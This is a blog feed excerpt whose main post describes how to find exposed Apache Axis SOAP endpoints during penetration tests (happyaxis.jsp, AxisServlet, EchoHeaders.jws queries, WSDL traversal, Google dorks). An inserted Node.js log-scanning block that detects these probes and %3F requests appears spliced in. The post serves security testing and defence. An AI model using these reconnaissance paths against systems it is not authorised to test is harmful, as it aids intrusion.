<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/dBIfIwKfhw8" width="420"></iframe></center>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-6721930668698559672012-11-12T19:27:00.001-08:002012-11-12T19:27:51.893-08:00GrrCon 2012 Talk - The Realm of Third Generation Botnet Attacks<center>
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/adrfBJH7v6o" width="560"></iframe></center>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-42076587153264670812012-10-31T14:49:00.000-07:002012-10-31T14:49:59.183-07:00(Pentest Apache #1) Exposed Apache Axis - SOAP ObjectsRecently, I was doing some open research. On compromising the Tomcat Apache Manager component, I came across Apache Axis.<br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif;"><b><span style="color: #fff2cc;"><i><span style="font-size: 15px; line-height: 22.549999237060547px; text-align: justify;">Apache Axis2™ is a Web Services / SOAP / WSDL engine, the successor to the widely used </span><a class="externalLink" href="http://ws.apache.org/axis/" style="background-image: none; font-size: 15px; line-height: 22.549999237060547px; padding: 0px; text-align: justify; text-decoration: none;"><span style="color: #fff2cc;">Apache Axis</span></a><span style="font-size: 15px; line-height: 22.549999237060547px; text-align: justify;"> SOAP stack. There are two implementations of the Apache Axis2 Web services engine - Apache Axis2/Java and Apache Axis2/C</span></i></span></b></span><br />
<i style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: #333333; font-size: 15px; line-height: 22.549999237060547px; text-align: justify;"><br /></span></i>
For more information about Apache Axis, refer here:<br />
<br />
<ul>
<li><b><a href="http://axis.apache.org/axis2/java/core/"><span style="color: orange;">http://axis.apache.org/axis2/java/core/</span></a></b></li>
<li><b><span style="color: orange;">http://axis.apache.org/axis/</span></b></li>
</ul>
<br />
It is highly advised that while conducting penetration tests (web + network), one should dig deeper to find exposed Apache Axis objects on the target servers. Primarily, misconfigured Apache Tomcat servers result in exposed SOAP objects belonging to the Apache Axis services engine.<br />
<br />
What to look for?<br />
<br />
1. <b>Default happyaxis.jsp:</b> This page provides a plethora of information about the configured web services on the target server. It examines the configuration as follows:<br />
<br />
<ul>
<li>Examining web application configuration (Needed + Optional Configuration)</li>
<li>Examining application server</li>
<li>Examining system properties</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikP-A6PzTkG-gWpcyfGmUTLNPJek_amC4HXVQDJGvFpSXlpn1tbByvyzMMwOQB2S8AKKNfvNODHMZBuuSGxB3YqqMLO2YjFDEj7QvW3bPW5ImrXuGT5YD2zzla0jkM8CDpJPxC7w/s1600/axis_happiness.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikP-A6PzTkG-gWpcyfGmUTLNPJek_amC4HXVQDJGvFpSXlpn1tbByvyzMMwOQB2S8AKKNfvNODHMZBuuSGxB3YqqMLO2YjFDEj7QvW3bPW5ImrXuGT5YD2zzla0jkM8CDpJPxC7w/s400/axis_happiness.png" width="400" /></a></div>
<br />
<br />
2. <b>Axis Servlet (/servlet/AxisServlet):</b> It reveals information about the web services deployed on the target server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVFcNBsL5EHdMfcFeXAb1IgK6s7_Ek2CIPcL_tctToW_h5xHwhFb3IZXW-IlFSCOoezIkOI-k0IRuTpyC8rFx4I028QDYY6u77FNs1N3RfPbzC2bRKy2wC9iZDpBlFKXiFyS_AWg/s1600/axis_servlet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVFcNBsL5EHdMfcFeXAb1IgK6s7_Ek2CIPcL_tctToW_h5xHwhFb3IZXW-IlFSCOoezIkOI-k0IRuTpyC8rFx4I028QDYY6u77FNs1N3RfPbzC2bRKy2wC9iZDpBlFKXiFyS_AWg/s320/axis_servlet.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
<b>3. Echo Headers (/EchoHeaders.jws): </b>This component calls the local endpoints to reveal HTTP headers.</div>
<div style="text-align: start;">
<span style="color: #222222; font-family: arial, sans-serif; font-size: x-small;"><span style="line-height: 16px;">For more information about JWS files, refer: </span></span><a href="http://docs.oracle.com/cd/E13226_01/workshop/docs70/help/guide/devenv/conJwsFiles.html"><b><span style="color: orange;">http://docs.oracle.com/cd/E13226_01/workshop/docs70/help/guide/devenv/conJwsFiles.html</span></b></a></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
3.1 If the method name is not specified (<b><span style="color: orange;">EchoHeaders.jws?method=</span></b>), it results in an exception, as follows:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggUNN051IeXkdlx2PmWqpLVakvCjRFg8G_EeASGaURlL5oIBU9gzCL05NkNOAj55GB57ZU8rZE52eiZT2zitj4lSOljOasPUotWQb5uNsRr8hq4kie6FpY5ttb8FCSjfwXOZDuEA/s1600/axis_http_header_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggUNN051IeXkdlx2PmWqpLVakvCjRFg8G_EeASGaURlL5oIBU9gzCL05NkNOAj55GB57ZU8rZE52eiZT2zitj4lSOljOasPUotWQb5uNsRr8hq4kie6FpY5ttb8FCSjfwXOZDuEA/s400/axis_http_header_1.png" width="400" /></a></div>
<div style="text-align: start;">
3.2 If the method name is specified (<b><span style="color: orange;">EchoHeaders.jws?method=list</span></b>), it returns results as follows:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNtNEWWzZ3cAPjQU6edsvDiJlDEhBuRBXhlFSSuqUpZb5qwg6PM8jMCWvNPZC7BnvCekKvX9FVXWpTWalZLD7yzhlR3wynzh8GMeV_z_KUY5jJaoU5DILCVBULzPm-6yvYsz5sng/s1600/axis_http_header_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNtNEWWzZ3cAPjQU6edsvDiJlDEhBuRBXhlFSSuqUpZb5qwg6PM8jMCWvNPZC7BnvCekKvX9FVXWpTWalZLD7yzhlR3wynzh8GMeV_z_KUY5jJaoU5DILCVBULzPm-6yvYsz5sng/s400/axis_http_header_2.png" width="400" /></a></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
3.3 Requesting the WSDL document (<b><span style="color: orange;">EchoHeaders.jws?wsdl</span></b>) returns the following:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifKQ8wnq3EOe-WWe8eKKQ19QWg0UkjtmhPMQlr1K2vobYnpQ14BpJmIFjv9PUz4MDQ1wLe7NHmllecpDfD7uV6aQ325c9yTOJxv4YUCplKbbulWszHUIU9bKku9MyltPYnZcDMJg/s1600/axis_http_header_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifKQ8wnq3EOe-WWe8eKKQ19QWg0UkjtmhPMQlr1K2vobYnpQ14BpJmIFjv9PUz4MDQ1wLe7NHmllecpDfD7uV6aQ325c9yTOJxv4YUCplKbbulWszHUIU9bKku9MyltPYnZcDMJg/s400/axis_http_header_3.png" width="400" /></a></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
4. Traverse the exposed <b><span style="color: orange;">WSDL Endpoints</span></b> listed by the <b>Axis Servlet (/servlet/AxisServlet).</b></div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxCIRqXRkolHeC9i1pwn8btTQJ_HpuzWWczp8OcL1pHT8VW9q3uDWXGk-rWtnXXwovE2NX_hXffz3ggKRTrLjxnyA3rik8tDig8RnjtrYfBpcBhMs3y_doQ3VaDpgbKcv-e7u_g/s1600/axis_exposed_wsdl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxCIRqXRkolHeC9i1pwn8btTQJ_HpuzWWczp8OcL1pHT8VW9q3uDWXGk-rWtnXXwovE2NX_hXffz3ggKRTrLjxnyA3rik8tDig8RnjtrYfBpcBhMs3y_doQ3VaDpgbKcv-e7u_g/s400/axis_exposed_wsdl.png" width="400" /></a></div>
<div style="text-align: start;">
<b><br /></b></div>
<div style="text-align: start;">
By default, the Administer Axis and SOAP Monitor components are disabled. But the information presented above still helps an attacker learn the configuration of the target server.</div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
So use Google dorks and the information provided in this post to manually detect exposed Apache Axis SOAP objects.</div>
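As a defender-side counterpart to this post and to the earlier "%3F" Apache post, here is an added JavaScript (Node.js) example, not code from either post, that runs two simple detections over Apache combined-format access-log lines: hits on the Axis diagnostic endpoints listed above (happyaxis.jsp, /servlet/AxisServlet, *.jws files and ?wsdl retrieval), and requests whose path part contains an encoded "?" (%3F) and were answered with a 200, which is the signature of the directory-listing behaviour from the %3F post. The log lines are constructed for this example and the rule names are its own.

```javascript
// Added example, not from either post. Two detections over Apache combined
// access-log lines: (a) encoded "?" (%3F) inside the path part, flagged
// separately when the server answered 200, and (b) requests for the Axis
// diagnostic endpoints and WSDL documents. Sample lines are constructed.

const COMBINED_LOG_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)(?: "([^"]*)" "([^"]*)")?/;

// Parse one combined-format line; returns null for anything that does not match.
function parseLogLine(line) {
  const m = COMBINED_LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], proto: m[5],
           status: Number(m[6]), size: m[7], referer: m[8], ua: m[9] };
}

// The access log stores the raw request target, so only a literal "?" starts
// the query; a percent-encoded %3F stays in the path part, which is what we want.
function splitTarget(target) {
  const i = target.indexOf('?');
  return i === -1
    ? { path: target, query: '' }
    : { path: target.slice(0, i), query: target.slice(i + 1) };
}

// Axis paths named in the post (hypothetical deployment prefix not assumed).
const AXIS_ENDPOINTS = [/\/happyaxis\.jsp$/i, /\/servlet\/AxisServlet/i, /\.jws$/i];

function classify(entry) {
  const { path, query } = splitTarget(entry.target);
  const findings = [];
  // (a) %3F in the path: the client sent an encoded "?" that Apache may decode
  //     into the path. A 200 here is worth a look for an unintended listing.
  if (/%3f/i.test(path)) {
    findings.push(entry.status === 200 ? 'encoded-qmark-path-200' : 'encoded-qmark-path');
  }
  // (b) Axis diagnostic endpoints and WSDL retrieval (?wsdl as a bare query key).
  if (AXIS_ENDPOINTS.some((re) => re.test(path))) findings.push('axis-endpoint');
  if (/(^|&)wsdl(=|&|$)/i.test(query)) findings.push('wsdl-retrieval');
  return findings;
}

// Returns one alert per log line that triggered at least one rule.
function scanLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    const findings = classify(entry);
    if (findings.length) {
      alerts.push({ ip: entry.ip, target: entry.target, status: entry.status, findings });
    }
  }
  return alerts;
}

// Constructed sample log (documentation IP ranges, example paths).
const SAMPLE_LOG = [
  '203.0.113.7 - - [20/Jan/2013:19:22:59 +0000] "GET /blog/%3Fpage_id=34 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [20/Jan/2013:19:23:48 +0000] "GET /blog/?page_id=34 HTTP/1.1" 200 18233 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [31/Oct/2012:14:49:59 -0700] "GET /axis/happyaxis.jsp HTTP/1.1" 200 9000 "-" "curl/7.26"',
  '198.51.100.9 - - [31/Oct/2012:14:50:10 -0700] "GET /axis/EchoHeaders.jws?wsdl HTTP/1.1" 200 2200 "-" "curl/7.26"',
  '192.0.2.4 - - [31/Oct/2012:15:00:00 -0700] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Three of the five constructed lines produce alerts: the %3F request answered with 200, the happyaxis.jsp hit, and the EchoHeaders.jws?wsdl retrieval (two findings on one line); the ordinary ?page_id=34 request and the index.html request are silent. The rules only flag the probes; the exposures themselves are removed by turning off directory listings (Options -Indexes) for the affected directory and by removing or access-restricting the Axis diagnostic pages on production Tomcat hosts.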
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
Enjoy!</div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-80643601455370580412012-07-01T08:07:00.001-07:002012-09-10T04:25:53.300-07:00Art of InfoJacking Talk at Source Seattle - 2011<iframe allowfullscreen="" frameborder="0" height="334" src="http://blip.tv/play/AYLO3goC.html?p=1" width="596"></iframe><embed src="http://a.blip.tv/api.swf#AYLO3goC" style="display: none;" type="application/x-shockwave-flash"></embed><br />
<br />
My talk at Source Seattle 2011.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-5520527045179037342012-07-01T07:55:00.001-07:002012-07-01T07:57:02.927-07:00LayerOne 2012 Talk - Mangling with Botnets<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/CqjkUehv9xo?feature=player_embedded' frameborder='0'></iframe></div>
<br />
My talk at LayerOne 2012 conference.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0